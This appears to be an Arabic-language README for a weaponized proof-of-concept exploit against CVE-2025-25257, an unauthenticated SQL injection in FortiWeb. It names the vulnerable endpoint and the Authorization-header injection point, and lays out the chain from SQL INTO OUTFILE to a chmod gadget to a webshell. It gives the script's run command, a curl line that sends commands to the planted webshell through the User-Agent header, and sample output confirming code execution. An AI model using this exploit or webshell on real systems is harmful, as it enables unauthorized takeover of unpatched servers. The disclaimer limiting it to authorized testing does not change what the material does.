
إثبات المفهوم (PoC) لـ CVE-2025-25257، وهي ثغرة حقن SQL حرجة غير موثقة في FortiWeb. يستغل حقن SQL عبر رأس Authorization لكتابة شيل ويب والحصول على تحكم عن بعد (RCE). لا يتطلب تسجيل دخول. آلي بالكامل.
حقن SQL حرج → تنفيذ Webshell
اكتشف وسلح بواسطة 0xgh057r3c0n
CVE-2025-25257 يؤثر على أنظمة FortiWeb التي تعرض نقطة النهاية /api/fabric/device/status، والتي تفشل في تعقيم إدخال رأس Authorization بشكل صحيح.
يمكن للمهاجم تنفيذ حقن SQL غير مصادق عليه لكتابة webshell على الخادم وتنفيذ الأوامر عن بعد.
SQL Injection ➜ SQL INTO OUTFILE ➜ Python chmod Gadget ➜ Trigger ➜ Webshell RCE
GET /api/fabric/device/status
Header: Authorization: Bearer ';<SQLi>
INTO OUTFILE الخاص بـ SQL لإسقاط الشلpython3 CVE-2025-25257.py -t https://target-host.com
ثم:
curl -k -H "User-Agent: whoami" https://target-host.com/cgi-bin/x.cgi
requestsالتثبيت:
pip install requests
[*] Writing Webshell Chunk: #!/bin/sh ...
[>] Exporting Webshell to File...
[*] Writing Chmod Gadget Chunk: import os ...
[>] Triggering chmod via Python Hook...
[*] Executing `id` via Webshell...
uid=33(www-data) gid=33(www-data)
[+] Webshell Ready:
> https://target-host.com/cgi-bin/x.cgi
> Send commands via User-Agent header
| المقياس | القيمة |
|---|---|
| النتيجة الأساسية | 9.8 (حرج) |
| متجه الهجوم | شبكة |
| الامتيازات المطلوبة | لا شيء |
| تفاعل المستخدم | لا شيء |
0xgh057r3c0n 🔗 github.com/0xgh057r3c0n
إثبات المفهوم هذا مخصص للاختبار التعليمي والمصرح به فقط. استخدمه على مسؤوليتك الخاصة. المؤلف غير مسؤول عن سوء الاستخدام.
| التأثير | عالي (C/I/A) |